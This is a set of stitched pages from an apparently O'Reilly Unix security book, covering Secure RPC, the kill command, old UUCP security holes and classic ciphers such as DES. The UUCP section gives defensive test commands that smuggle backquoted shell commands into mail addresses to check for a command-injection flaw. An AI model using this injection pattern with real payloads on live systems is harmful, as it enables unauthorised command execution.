file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_03.htm (4 of 6) [2002-04-12 10:44:40]


[Chapter 19] 19.3 <strong>Sec</strong>ure RPC (AUTH_DES)<br />

mount option.<br />

To continue the above example, suppose your workstation mounted the /usr/spool/mail directory with the line:<br />

mailhub:/usr/spool/mail /usr/spool/mail nfs rw,intr,bg 0 0<br />

To mount this filesystem with the secure option, you would change the line to read:<br />

mailhub:/usr/spool/mail /usr/spool/mail nfs rw,intr,bg,secure 00<br />

After changing /etc/fstab, you need to umount and mount the filesystems again.<br />

19.3.3 Using <strong>Sec</strong>ure RPC<br />

Using <strong>Sec</strong>ure RPC is very similar to using standard RPC. If you log in by typing your username and password (either at the login<br />

window on the console or by using telnet or rlogin to reach your machine), your secret key is automatically decrypted and stored in<br />

the key server. <strong>Sec</strong>ure RPC automatically performs the authentication "handshake" every time you contact a service for the first time.<br />

In the event that your session key expires - either because of a time expiration or a crash and reboot - <strong>Sec</strong>ure RPC automatically<br />

obtains another session key.<br />

If you log in over the network without having to type a password - for example, you use rlogin to reach your computer from a trusted<br />

machine - you will need to use the keylogin program to have your secret key calculated and stored in the key server. Unfortunately,<br />

this will result in your key being sent over the network and makes it subject to eavesdropping.<br />

Before you log out of your workstation, be sure to run the keylogout program to destroy the copy of your secret key stored in the key<br />

server. If you use csh as your shell, you can run this program automatically by placing the command keylogout in your ~/.logout file:<br />

#<br />

# ~/.logout file<br />

#<br />

# Destroy secret keys<br />

keylogout<br />

19.3.4 Limitations of <strong>Sec</strong>ure RPC<br />

Sun's <strong>Sec</strong>ure RPC represents a quantum leap in security over Sun's standard RPC. This is good news for sites that use NFS: with<br />

<strong>Sec</strong>ure RPC, NFS can be used with relative safety. Nevertheless, <strong>Sec</strong>ure RPC it is not without its problems:<br />

●<br />

●<br />

●<br />

●<br />

Every network client must be individually modified for use with <strong>Sec</strong>ure RPC. Although <strong>Sec</strong>ure RPC is a transparent<br />

modification to Sun's underlying RPC system, the current design of Sun's RPC library requires an application program to<br />

specify individually which authentication system (AUTH_NONE, AUTH_<strong>UNIX</strong>, AUTH_DES, or AUTH_KERB) the<br />

program wants to use. For this reason, every client that uses a network service must be individually modified to use<br />

AUTH_DES authentication.<br />

Although the modifications required are trivial, a better approach would be to allow the user to specify the authentication<br />

service requested in an environment variable, or on some other per-user or per-site, rather than per-program, basis.[10]<br />

[10] We said the same thing five years ago, in the first version of this book.<br />

There is a performance penalty. <strong>Sec</strong>ure RPC penalizes every RPC transaction that uses it, because the RPC authenticator<br />

must be decrypted using DES to verify each transmission. Fortunately, the performance penalty is small: On a Sun-4, only 1.5<br />

milliseconds are required for the decryption. In comparison, the time to complete an average NFS transaction is about 20<br />

milliseconds, making the performance penalty about eight percent.<br />

<strong>Sec</strong>ure RPC does not provide for data integrity or confidentiality. <strong>Sec</strong>ure RPC authenticates the user, but it does not<br />

protect the data that is transmitted with either encryption or digital signatures. It is the responsibility of programs using <strong>Sec</strong>ure<br />

RPC to encrypt using a suitable key and algorithm.<br />

It may be possible to break the public key. Any piece of information encrypted with the Diffie-Hellman public key<br />

encryption system used in <strong>Sec</strong>ure RPC can be decrypted if an attacker can calculate the discrete logarithm of the public key. In<br />

1989, Brian LaMacchia and Andrew Odlyzko at AT&T's Bell Laboratories in New Jersey discovered a significant<br />

performance improvement for the computation of discrete logarithms. Since then, numerous other advances in this field of<br />

mathematics have taken place. <strong>Sec</strong>ure RPC makes the public key and the encrypted secret key available to RPC client<br />

computers on the network. Thus, keys that are secure today may be broken tomorrow.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_03.htm (5 of 6) [2002-04-12 10:44:40]


[Chapter 19] 19.3 <strong>Sec</strong>ure RPC (AUTH_DES)<br />

●<br />

It may be possible to break the secret key. The <strong>Sec</strong>ure RPC secret key is encrypted with a 56-bit DES key and is made<br />

publicly available on the network server. As computers become faster, the possibility of a brute force attack against the user's<br />

encrypted secret key may become a reality.<br />

In the final analysis, using <strong>Sec</strong>ure RPC appears to provide much better protection than many other approaches, especially with<br />

multiuser machines. <strong>Sec</strong>ure RPC is clearly better than plain RPC. Unfortunately, because <strong>Sec</strong>ure RPC requires the use of either NIS<br />

or NIS+, some multi-vendor sites have chosen not to use it. These sites should consider DCE, which provides a workable solution for<br />

a heterogeneous environment.<br />

19.2 Sun's Remote Procedure<br />

Call (RPC)<br />

19.4 Sun's Network<br />

Information Service (NIS)<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_03.htm (6 of 6) [2002-04-12 10:44:40]


[Appendix C] C.4 The kill Command<br />

C.4 The kill Command<br />

Appendix C<br />

<strong>UNIX</strong> Processes<br />

You can use the kill command to stop or merely pause the execution of a process. You might want to kill<br />

a "runaway" process that is consuming CPU and memory for no apparent reason; you might also want to<br />

kill the processes belonging to an intruder. kill works by sending a signal to a process. Particularly useful<br />

signals are described in detail below. The syntax of the kill command is:<br />

kill [-signal] process-IDs<br />

The kill command allows signals to be specified by their names in most modern versions of <strong>UNIX</strong>. To<br />

send a hangup to process #1, for example, type:<br />

# kill -HUP 1<br />

With some older versions of <strong>UNIX</strong>, you must specify the signal by number:<br />

# kill -1 1<br />

The superuser can kill any process; other users can kill only their own processes. You can kill many<br />

processes at a time by listing all of their PIDS on the command line:<br />

# kill -HUP 1023 3421 3221<br />

By default, kill sends signal 15 (SIGTERM), the process-terminate signal. Berkeley-derived systems also<br />

have some additional options to the kill command:<br />

●<br />

●<br />

●<br />

●<br />

If you specify 0 as the PID, the signal is sent to all the processes in your process group.<br />

If you specify -1 as a PID and you are not the superuser, the signal is sent to all processes having<br />

the same UID as you.<br />

If you specify -1 as a PID and you are the superuser, the signal is sent to all processes except<br />

system processes, process #1, and yourself.<br />

If you specify any other negative value, the signal is sent to all processes in the process group<br />

numbered the same as the absolute value of your argument.<br />

To send any signal, you must have the same real or effective UID as the target processes or you must be<br />

operating as the superuser.<br />

Many signals, including SIGTERM, can be caught by programs. With a caught signal, a programmer has<br />

three choices of action:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_04.htm (1 of 2) [2002-04-12 10:44:40]


[Appendix C] C.4 The kill Command<br />

●<br />

●<br />

●<br />

Ignore it.<br />

Perform the default action.<br />

Execute a program-specified function.<br />

There are two signals that cannot be caught: signal 9 ( SIGKILL) and signal 17 ( SIGSTOP).<br />

One signal that is very often sent is signal 1 ( SIGHUP), which simulates a hangup on a modem.<br />

Standard practice when killing a process is to first send signal 1 (hangup); if the process does not<br />

terminate, then send it signal 15 (software terminate), and finally signal 9 (sure kill).<br />

Sometimes simply killing a rogue process is the wrong thing to do: you can learn more about a process<br />

by stopping it and examining it with some of <strong>UNIX</strong>'s debugging tools than by "blowing it out of the<br />

water." Sending a process a SIGSTOP will stop the process but will not destroy the process's memory<br />

image.<br />

Under most modern versions of <strong>UNIX</strong>, you can use the gcore program to generate a core file of a running<br />

process, which you can then leisurely examine with adb (a debugger), dbx (another debugger), or gdb<br />

(yet another debugger). If you simply want to get an idea of what the process was doing, you can run<br />

strings (a program that finds printable strings in a binary file) over the core image to see what files it was<br />

referencing.<br />

A core file is a specially formatted image of the memory being used by the process at the time the signal<br />

was caught. By examining the core file, you can see what routines were being executed, register values,<br />

and more. You can also fill your disk with a core file - be sure to look at the memory size of a process via<br />

the ps command before you try to get its core image!<br />

NOTE: Some versions of <strong>UNIX</strong> name core files core.####, where #### is the PID of the<br />

process that generated the core file, or name.core, where name is the name of the program's<br />

executable.<br />

Programs that you run may also dump core if they receive one of the signals that causes a core dump. On<br />

systems without a gcore program, you can send a SIGEMT or SIGSYS signal to cause the program to<br />

dump core. That method will work only if the process is currently in a directory where it can write, if it<br />

has not redefined the action to take on receiving the signal, and if the core will not be larger than the core<br />

file limits imposed for the process's UID. If you use this approach, you will also be faced with the<br />

problem of finding where the process left the core file!<br />

C.3 Signals C.5 Starting Up <strong>UNIX</strong> and<br />

Logging In<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appc_04.htm (2 of 2) [2002-04-12 10:44:40]


[Chapter 15] 15.7 Early <strong>Sec</strong>urity Problems with UUCP<br />

Chapter 15<br />

UUCP<br />

15.7 Early <strong>Sec</strong>urity Problems with UUCP<br />

UUCP is one of the oldest major subsystems of the <strong>UNIX</strong> operating system (older than the csh), and it<br />

has had its share of security holes. All of the known security problems have been fixed in recent years.<br />

Unfortunately, there are still some old versions of UUCP in use.<br />

The main UUCP security problems were most easily triggered by sending mail messages to addresses<br />

other than valid user names. In one version of UUCP, mail could be sent directly to a file; in another<br />

version of UUCP, mail could be sent to a special address that caused a command to be executed -<br />

sometimes as root! Both of these holes pose obvious security problems. [8]<br />

[8] Interestingly enough, these same problems reappeared in the sendmail program in recent<br />

years. People designing software don't seem to be very good about learning from the past.<br />

Fortunately, you can easily check to see if the version of UUCP you are running contains these flaws. If<br />

it does, get a software upgrade, or disable your version of UUCP. A current version of BNU UUCP can<br />

be licensed from AT&T if your vendor doesn't have one.<br />

To check your version of UUCP, follow the steps outlined here:<br />

1.<br />

2.<br />

Your mail system should not allow mail to be sent directly to a file. Mailers that deliver directly to<br />

files can be used to corrupt system databases or application programs. You can test whether or not<br />

your system allows mail to be sent to a file with the command sequence:<br />

$ mail /tmp/mailbug<br />

this is a mailbug file test<br />

^D<br />

If the file mailbug appears in the /tmp directory, then your mailer is unsecure. If your mailer<br />

returns a mail message to you with an error notification (usually containing a message like "cannot<br />

deliver to a file"), then your mail program does not contain this error. You should try this test with<br />

/bin/mail, /bin/rmail, and any other mail delivery program on your system.<br />

Your UUCP system should not allow commands to be encapsulated in addresses. This bug arises<br />

from the fact that some early uuxqt implementations used the system ( ) library function to spawn<br />

commands (including mail). Mail sent to an address containing a backrsquoed command string<br />

would cause that command string to be executed before the mail was delivered. You can test<br />

whether or not your system executes commands encapsulated in addresses with the command<br />

sequence:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_07.htm (1 of 2) [2002-04-12 10:44:41]


[Chapter 15] 15.7 Early <strong>Sec</strong>urity Problems with UUCP<br />

3.<br />

$ uux - mail 'root `/bin/touch /tmp/foo`'<br />

this is a mailbug command test<br />

^D<br />

$ uux - mail 'root & /bin/touch /tmp/foo'<br />

this is another test<br />

^D<br />

The system should return mail with a message that /bin/touch /tmp/foo is an unknown user. If the<br />

mailer executed the touch - you can tell because a foo file will be created in your /tmp directory -<br />

then your uux program is unsecure. Get a new version from your vendor.<br />

Check both types of addresses described earlier for mail that is sent by UUCP as well as for mail<br />

that originates locally on your system. For example, if the machines prose and idr are connected by<br />

UUCP, then log onto idr and try:<br />

$ mail 'prose!/tmp/send1'<br />

Subject: This is a mailbug test<br />

Test<br />

^D<br />

$ mail 'prose!`/bin/touch /tmp/foo`'<br />

Subject: This is a mail bugtest #2<br />

Another test.<br />

^D<br />

15.6 Additional <strong>Sec</strong>urity<br />

Concerns<br />

15.8 UUCP Over Networks<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_07.htm (2 of 2) [2002-04-12 10:44:41]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

Chapter 6<br />

Cryptography<br />

6.4 Common Cryptographic Algorithms<br />

There are two basic kinds of encryption algorithms in use today:<br />

●<br />

●<br />

Private key cryptography, which uses the same key to encrypt and decrypt the message. This type is also<br />

known as symmetric key cryptography.<br />

Public key cryptography, which uses a public key to encrypt the message and a private key to decrypt it.<br />

The name public key comes from the fact that you can make the encryption key public without<br />

compromising the secrecy of the message or the decryption key. Public key systems are also known as<br />

asymmetric key cryptography.<br />

Private key cryptography is most often used for protecting information stored on a computer's hard disk, or for<br />

encrypting information carried by a communications link between two different machines. Public key<br />

cryptography is most often used for creating digital signatures on data, such as electronic mail, to certify the<br />

data's origin and integrity.<br />

This analysis gives rise to a third kind of system:<br />

●<br />

Hybrid public/private cryptosystems. In these systems, slower public key cryptography is used to exchange<br />

a random session key, which is then used as the basis of a private key algorithm. (A session key is used<br />

only for a single encryption session and is then discarded.) Nearly all practical public key cryptography<br />

implementations are actually hybrid systems.<br />

6.4.1 Summary of Private Key Systems<br />

The following list summarizes the private key systems in common use today.<br />

ROT13<br />

crypt<br />

DES<br />

A simple cryptography algorithm which is used, among other things, to obscure the content of risqué jokes<br />

on various Usenet groups. The ROT13 encryption algorithm has no key, and it is not secure.<br />

The original <strong>UNIX</strong> encryption program which is modeled on the German Enigma encryption machine.<br />

crypt uses a variable-length key. Some programs can automatically decrypt crypt-encrypted files without<br />

prior knowledge of the key or the plaintext. crypt is not secure. (This program should not be confused with<br />

the secure one-way crypt program that <strong>UNIX</strong> uses for encrypting passwords.)<br />

The Data Encryption Standard (DES), an encryption algorithm developed in the 1970s by the National<br />

Bureau of Standards and Technology (since renamed the National Institute of Standards and Technology,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (1 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

RC2<br />

RC4<br />

RC5<br />

or NIST) and IBM. DES uses a 56-bit key.[8]<br />

[8] Technically, we should refer to it as the DEA: Data Encryption Algorithm.<br />

Standard-conforming implementations are certified by NIST, and usually require a hardware<br />

implementation. However, nearly everyone refers to it as the DES, so we will too.<br />

A block cipher originally developed by Ronald Rivest and kept as a trade secret by RSA Data <strong>Sec</strong>urity.<br />

This algorithm was revealed by an anonymous Usenet posting in 1996 and appears to be reasonably strong<br />

(although there are some particular keys that are weak). RC2 is sold with an implementation that allows<br />

keys between 1 and 2048 bits. The RC2mail key length is often limited to 40 bits in software that is sold<br />

for export.[9]<br />

[9] Unfortunately, a 40-bit key is vulnerable to a brute force attack.<br />

A stream cipher originally developed by Ronald Rivest and kept as a trade secret by RSA Data <strong>Sec</strong>urity.<br />

This algorithm was revealed by an anonymous Usenet posting in 1994 and appears to be reasonably strong<br />

(although there are some particular keys that are weak). RC4 is sold with an implementation that allows<br />

keys between 1 and 2048 bits. The RC4 key length is often limited to 40 bits in software that is sold for<br />

export.[10]<br />

[10] Unfortunately, a 40-bit key is vulnerable to a brute force attack.<br />

A block cipher developed by Ronald Rivest and published in 1994. RC5 allows a user-defined key length,<br />

data block size, and number of encryption rounds.<br />

IDEA<br />

Skipjack<br />

The International Data Encryption Algorithm (IDEA), developed in Zurich, Switzerland by James L.<br />

Massey and Xuejia Lai and published in 1990. IDEA uses a 128-bit key, and is believed to be quite strong.<br />

IDEA is used by the popular program PGP (described later in this chapter) to encrypt files and electronic<br />

mail. Unfortunately,[11] wider use of IDEA may be hampered by a series of software patents on the<br />

algorithm which is currently held by Ascom-Tech AG, in Solothurn, Switzerland. Ascom-Tech supposedly<br />

will allow IDEA to be used royalty free in implementations of PGP outside the U.S., but concerned users<br />

should verify the terms with Ascom-Tech or their licensees directly.<br />

[11] Although we are generally in favor of intellectual property protection, we are opposed to<br />

the concept of software patents, in part because they hinder the development and use of<br />

innovative software by individuals and small companies.<br />

A classified (SECRET) algorithm developed by the National <strong>Sec</strong>urity Agency (NSA). Reportedly, a Top<br />

<strong>Sec</strong>ret security clearance is required to see the algorithm's source code and design specifications. Skipjack<br />

is the algorithm used by the Clipper encryption chip. It uses an 80-bit key.<br />

6.4.2 Summary of Public Key Systems<br />

The following list summarizes the public key systems in common use today:<br />

Diffie-Hellman<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (2 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

RSA<br />

A system for exchanging cryptographic keys between active parties. Diffie-Hellman is not actually a<br />

method of encryption and decryption, but a method of developing and exchanging a shared private key<br />

over a public communications channel. In effect, the two parties agree to some common numerical values,<br />

and then each party creates a key. Mathematical transformations of the keys are exchanged. Each party can<br />

then calculate a third session key that cannot easily be derived by an attacker who knows both exchanged<br />

values.<br />

Several versions of this protocol exist, involving a differing number of parties and different<br />

transformations. Particular care must be exercised in the choice of some of the numbers and calculations<br />

used or the exchange can be easily compromised. If you are interested, consult the references for all the<br />

gory details.<br />

The Diffie-Hellman algorithm is frequently used as the basis for exchanging cryptographic keys for<br />

encrypting a communications link. The key may be any length, depending on the particular implementation<br />

used. Longer keys are generally more secure.<br />

The well-known public key cryptography system developed by (then) MIT professors Ronald Rivest and<br />

Adi Shamir, and by USC professor Leonard Adleman. RSA can be used both for encrypting information<br />

and as the basis of a digital signature system. Digital signatures can be used to prove the authorship and<br />

authenticity of digital information. The key may be any length, depending on the particular implementation<br />

used. Longer keys are generally considered to be more secure.<br />

ElGamal<br />

DSA<br />

Another algorithm based on exponentiation and modular arithmetic. ElGamal may be used for encryption<br />

and digital signatures in a manner similar to the RSA algorithm. Longer keys are generally considered to<br />

be more secure.<br />

The Digital Signature Algorithm, developed by NSA and adopted as a Federal Information Processing<br />

Standard (FIPS) by NIST. Although the DSA key may be any length, only keys between 512 and 1024 bits<br />

are permitted under the FIPS. As specified, DSA can only be used for digital signatures, although it is<br />

possible to use DSA implementations for encryption as well. The DSA is sometimes referred to as the<br />

DSS, in the same manner as the DEA is usually referred to as the DES.<br />

Table 6.1 lists all of the private and public key algorithms we've discussed<br />

Table 6.1: Commonly Used Private and Public Key Cryptography Algorithms<br />

Algorithm Description<br />

Private Key Algorithms:<br />

ROT13 Keyless text scrambler; very weak.<br />

crypt Variable key length stream cipher; very weak.[12]<br />

DES 56-bit block cipher; patented, but freely usable (but not exportable).<br />

RC2 Variable key length block cipher; proprietary.<br />

RC4 Variable key length stream cipher; proprietary.<br />

RC5 Variable key length block cipher; proprietary.<br />

IDEA 128-bit block cipher; patented.<br />

Skipjack 80-bit stream cipher; classified.<br />

Public Key Algorithms:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (3 of 14) [2002-04-12 10:44:44]


Diffie-Hellman Key exchange protocol; patented.<br />

RSA Public key encryption and digital signatures; patented<br />

ElGamal Public key encryption and digital signatures; patented.<br />

DSA Digital signatures only; patented.<br />

.<br />

[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

[12] Actually, crypt is a fair cipher for files of length less than 1024 bytes. Its recurrence properties<br />

only surface when used on longer inputs, thus providing more information for decrypting.<br />

The following sections provide some technical information about a few of the algorithms mentioned above. If<br />

you are only interested in using encryption, you can skip ahead to the section called "Encryption Programs<br />

Available for <strong>UNIX</strong>" later in this chapter.<br />

6.4.3 ROT13: Great for Encoding Offensive Jokes<br />

ROT13 is a simple substitution cipher[13] that is traditionally used for distributing potentially objectionable<br />

material on the Usenet, a worldwide bulletin board system. It is a variation on the Caesar Cipher - an encryption<br />

method used by Caesar's troops thousands of years ago. In the ROT13 cipher, each letter of the alphabet is<br />

replaced with a letter that is 13 letters further along in the alphabet (with A following Z). Letters encrypt as<br />

follows:<br />

[13] Technically, it is an encoding scheme - the "rotation" is fixed, and it does a constant encoding<br />

from a fixed alphabet.<br />

Plaintext Ciphertext<br />

A N<br />

B O<br />

. . .<br />

M Z<br />

N A<br />

. . .<br />

Z M<br />

ROT13 used to be the most widely used encryption system in the <strong>UNIX</strong> world. However, it is not secure at all.<br />

Many news and mail-reading programs automatically decrypt ROT13-encoded text with a single keystroke. Some<br />

people are known to be able to read ROT13 text without any machine assistance whatsoever.<br />

For example, here is a ROT13 message:<br />

Jung tbrf nebhaq, pbzrf nebhaq.<br />

And here is how the message decrypts:<br />

What goes around, comes around.<br />

If you are not blessed with the ability to read ROT13 files without computer assistance, you can use the following<br />

command to either encrypt or decrypt files with the ROT13 algorithm:[14]<br />

[14] On some versions of <strong>UNIX</strong>, you will need to remove the "[ ]" symbols.<br />

% tr "[a-z][A-Z]" "[n-z][a-m][N-Z][A-M]" < filename<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (4 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

Needless to say, do not use ROT13 as a means of protecting your files! The only real use for this "encryption"<br />

method is the one to which it is put on the Usenet: to keep someone who does not want to be exposed to material<br />

(such as the answer to a riddle, a movie spoiler in a review, or an offensive joke) from reading it inadvertently.<br />

6.4.4 DES<br />

One of the most widely used encryption systems today is the Data Encryption Standard (DES), developed in the<br />

1970s and patented by researchers at IBM. The DES was an outgrowth of another IBM cipher known as Lucifer.<br />

IBM made the DES available for public use, and the federal government issued Federal Information Processing<br />

Standard Publication (FIPS PUB) Number 46 in 1977 describing the system. Since that time, the DES has been<br />

periodically reviewed and reaffirmed (most recently in December 30, 1993), until 1998 as FIPS PUB 46-2. It has<br />

also been adopted as an American National Standard (X3.92-1981/R1987).<br />

The DES performs a series of bit permutation, substitution, and recombination operations on blocks containing 64<br />

bits of data and 56 bits of key (eight 7-bit characters). The 64 bits of input are permuted initially, and are then<br />

input to a function using static tables of permutations and substitutions (called S-boxes). The bits are permuted in<br />

combination with 48 bits of the key in each round. This process is iterated 16 times (rounds), each time with a<br />

different set of tables and different bits from the key. The algorithm then performs a final permutation, and 64<br />

bits of output are provided. The algorithm is structured in such a way that changing any bit in the input has a<br />

major effect on almost all of the output bits. Indeed, the output of the DES function appears so unrelated to its<br />

input that the function is sometimes used as a random number generator.<br />

Although there is no standard <strong>UNIX</strong> program that performs encryption using the DES, some vendors' versions of<br />

<strong>UNIX</strong> include a program called des which performs DES encryption. (This command may not be present in<br />

international versions of the operating system, as described in the next section.)<br />

6.4.4.1 Use and export of DES<br />

The DES was mandated as the encryption method to be used by all federal agencies in protecting sensitive but not<br />

classified information.[15] The DES is heavily used in many financial and communication exchanges. Many<br />

vendors make DES chips that can encode or decode information fast enough to be used in data-encrypting<br />

modems or network interfaces. Note that the DES is not (and has never been) certified as an encryption method<br />

that can be used with U.S. Department of Defense classified material.<br />

[15] Other algorithms developed by the NSA are designed for use with classified information.<br />

Export control rules restrict the export of hardware or software implementations of the DES, even though the<br />

algorithm has been widely published and implemented many times outside the United States. If you have the<br />

international version of <strong>UNIX</strong>, you may find that your system lacks a des command. If you find yourself in this<br />

position, don't worry; good implementations of the DES can be obtained via anonymous FTP from almost any<br />

archive service, including the Usenet comp.sources archives.<br />

For more information about export of cryptography, see "Encryption and U.S. Law," later in this chapter.<br />

6.4.4.2 DES modes<br />

FIPS PUB 81 explains how the DES algorithm can be used in four modes:<br />

●<br />

●<br />

●<br />

Electronic Code Book (ECB)<br />

Cipher Block Chaining (CBC)<br />

Cipher Feedback (CFB)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (5 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

●<br />

Output Feedback (OFB)<br />

Each mode has particular advantages in some circumstances, such as when transmitting text over a noisy channel,<br />

or when it is necessary to decrypt only a portion of a file. The following provides a brief discussion of these four<br />

methods; consult FIPS PUB 81 or a good textbook on cryptography for details.<br />

●<br />

●<br />

●<br />

●<br />

ECB Mode. In electronic code book (ECB) mode, each block of the input is encrypted using the same key,<br />

and the output is written as a block. This method performs simple encryption of a message, a block at a<br />

time. This method may not indicate when portions of a message have been inserted or removed. It works<br />

well with noisy transmission channels - alteration of a few bits will corrupt only a single 64-bit block.<br />

CBC Mode. In cipher block chaining (CBC) mode, the plaintext is first XOR'ed with the encrypted value<br />

of the previous block. Some known value (usually referred to as the initialization vector, or IV) is used for<br />

the first block. The result is then encrypted using the key. Unlike ECB mode, long runs of repeated<br />

characters in the plaintext will be masked in the output. CBC mode is the default mode for Sun<br />

Microsystems' des program.<br />

CFB Mode. In cipher feedback (CFB) mode, the output is fed back into the mechanism. After each block is<br />

encrypted, part of it is shifted into a shift register. The contents of this shift register are encrypted with the<br />

user's key value using (effectively) ECB mode, and this output is XOR'd with the data stream to produce<br />

the encrypted result. This method is self synchronizing, and enables the user to decrypt only a portion of a<br />

large database by starting a fixed distance before the start of the desired data.<br />

OFB Mode. In output feedback (OFB) mode, the output is also fed back into the mechanism. A register is<br />

initialized with some known value (again, the IV). This register is then encrypted with (effectively) ECB<br />

mode using the user's key. The result of this is used as the key to encrypt the data block (using an XOR<br />

operation), and it is also stored back into the register for use on the next block. The algorithm effectively<br />

generates a long stream of key bits that can be used to encrypt/decrypt communication streams, with good<br />

tolerance for small bit errors in the transmission. This mode is almost never used in <strong>UNIX</strong>-based systems.<br />

All of these modes require that byte and block boundaries remain synchronized between the sender and recipient.<br />

If information is inserted or removed from the encrypted data stream, it is likely that all of the following data<br />

from the point of modification can be rendered unintelligible.<br />

6.4.4.3 DES strength<br />

Ever since DES was first proposed as a national standard, some people have been suspicious of the algorithm.<br />

DES was based on a proprietary encryption algorithm developed by IBM called Lucifer, which IBM had<br />

submitted to the National Bureau of Standards (NBS)[16] for consideration as a national cryptographic standard.<br />

But whereas Lucifer had a key that was 112 bits long, the DES key was shortened to 56 bits at the request of the<br />

National <strong>Sec</strong>urity Agency. The NSA also requested that certain changes be made in the algorithm's S-boxes.<br />

Many people suspected that NSA had intentionally weakened the Lucifer algorithm, so the final standard adopted<br />

by NBS would not pose a threat to the NSA's ongoing intelligence collection activities. But nobody had any<br />

proof.<br />

[16] NBS later became the National Institute of Standards and Technology.<br />

Today the DES is more than 20 years old, and the algorithm is definitely showing its age. Recently Michael<br />

Weiner, a researcher at Bell Northern Research, published a paper detailing how to build a machine capable of<br />

decrypting messages encrypted with the DES by conducting an exhaustive key search. Such a machine could be<br />

built for a few million dollars, and could break any DES-encrypted message in about a day. We can reasonably<br />

assume that such machines have been built by both governments and private industry.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (6 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

In June 1994, IBM published a paper describing the design criteria of the DES. The paper claims that the choices<br />

of the DES key size, S-boxes, and number of rounds were a direct result of the conflicting goals of making the<br />

DES simple enough to fit onto a single chip with 1972 chip-making technology, and the desire to make it<br />

resistant to differential cryptanalysis.<br />

These two papers, coupled with many previously published analyses, appear to have finally settled a long-running<br />

controversy as to whether or not NSA had intentionally built in weaknesses to the DES. The NSA didn't build a<br />

back door into DES that would have allowed it to forcibly decrypt any DES-encrypted transmission: it didn't need<br />

to. Messages encrypted with DES can be forcibly decrypted simply by trying every possible key, given the<br />

appropriate hardware.<br />

6.4.5 Improving the <strong>Sec</strong>urity of DES<br />

You can improve the security of DES by performing multiple encryptions, known as superencryption. The two<br />

most common ways of doing this are with double encryption (Double DES) and with triple encryption (Triple<br />

DES).<br />

While double DES appears to add significant security, research has found some points of attack, and therefore<br />

experts recommend Triple DES for applications where single DES is not adequate.<br />

6.4.5.1 Double DES<br />

In Double DES, each 64-bit block of data is encrypted twice with the DES algorithm, first with one key, then<br />

with another, as follows:<br />

1.<br />

2.<br />

Encrypt with (key 1).<br />

Encrypt with (key 2).<br />

Plaintext (key1) (key2) ciphertext<br />

Double DES is not significantly more secure than single DES. In 1981, Ralph Merkle and Martin Hellman<br />

published an article[17] in which they outlined a so-called "meet-in-the-middle attack."<br />

[17] R. C. Merkle and M. Hellman, "On the <strong>Sec</strong>urity of Multiple Encryption," Communications of<br />

the ACM, Volume 24, Number 7, July 1981, pp. 465-467.<br />

The meet-in-the-middle attack is a known plaintext attack which requires that an attacker have both a known<br />

piece of plaintext and a block of that same text that has been encrypted. (These pieces are surprisingly easily to<br />

get.) The attack requires storing 2 56 intermediate results when trying to crack a message that has been encrypted<br />

with DES (a total of 2 59 bytes), but it reduces the number of different keys you need to check from 2 112 to 2 57.<br />

"This is still considerably more memory storage than one could comfortably comprehend, but it's enough to<br />

convince the most paranoid of cryptographers that double encryption is not worth anything," writes Bruce<br />

Schneier in his landmark volume, Applied Cryptography.<br />

In other words, because a message encrypted with DES can be forcibly decrypted by an attacker performing an<br />

exhaustive key search today, an attacker might also be able to forcibly decrypt a message encrypted with Double<br />

DES using a meet-in-the-middle attack at some point in the future.<br />

6.4.5.2 Triple DES<br />

The dangers of the Merkle-Hellman meet-in-the-middle attack can be circumvented by performing three block<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_04.htm (7 of 14) [2002-04-12 10:44:44]


[Chapter 6] 6.4 Common Cryptographic Algorithms<br />

encryption operations. This method is called Triple DES.<br />

In practice, the most common way to perform Triple DES is:<br />

1.<br />

2.<br />

3.<br />

Encrypt with (key1).<br />

Decrypt with (key2).<br />

Encrypt with (key3).<br />

The advantage of this technique is that it can be backward compatible with single DES, simply by setting all three<br />

keys to be the same value.<br />

To decrypt, reverse the steps:<br />

1.<br />

2.<br />

3.<br />

Decrypt with (key3).<br />

Encrypt with (key2).<br />

Decrypt with (key1).<br />

For many applications, you can use the same key for both key1 and key3 without creating a significant<br />

vulnerability.<br />

Triple DES appears to be roughly as secure as single DES would be if it had a 112-bit key. How secure is this<br />

really? Suppose you had an integrated circuit which could perform one million Triple DES encryptions per<br />

second, and you built a massive computer containing one million of these chips to forcibly try all Triple DES<br />

keys. This computer, capable of testing 1012 encryptions per second, would require:<br />

